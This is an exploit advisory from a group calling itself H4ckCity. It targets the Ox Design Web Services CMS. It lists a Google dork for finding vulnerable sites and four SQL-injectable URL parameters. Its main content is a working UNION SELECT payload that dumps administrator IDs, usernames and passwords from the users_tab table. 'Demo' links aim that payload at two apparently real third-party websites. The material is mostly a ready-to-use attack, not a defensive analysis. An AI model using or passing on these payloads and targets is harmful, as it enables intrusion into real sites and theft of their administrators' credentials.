############################################################################ # Exploit Title: Ox Design Web Services SQL Injection Vulnerability # Google Dork: intext:"Powered by Ox Design Web Services" # Date: 6/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Software Link: www.oxdesign.gr # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ # # # Exploit: # # # [~] SQL Injection: # # http://[target]/services.php?id=[SQLi*] # http://[target]/multimedia.php?id=[SQLi] # http://[target]/news.php?id=[SQLi] # http://[target]/news.php?pg=[SQLi] # # [~] SQLi* : # # table for admin user :users_tab # column for users_tab :id_user,user_type_user,username_user,password_user # # -1+union+select+1,2,3,group_concat(id_user,0x3a,user_type_user,0x3a,username_user,0x3a,password_user),5,6,7,8+from+users_tab-- # # # Demo: # # www.diaviouexelixi.gr/services.php?id=-1+union+select+1,2,3,group_concat(id_user,0x3a,user_type_user,0x3a,username_user,0x3a,password_user),5,6,7,8+from+users_tab-- # # www.cgoutos.gr/en/services.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(id_user,0x3a,user_type_user,0x3a,username_user,0x3a,password_user)+from+users_tab-- # # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,... ############################################################################ GreetZ : All H4ckCity Member - BHG Members - 1337day.com ############################################################################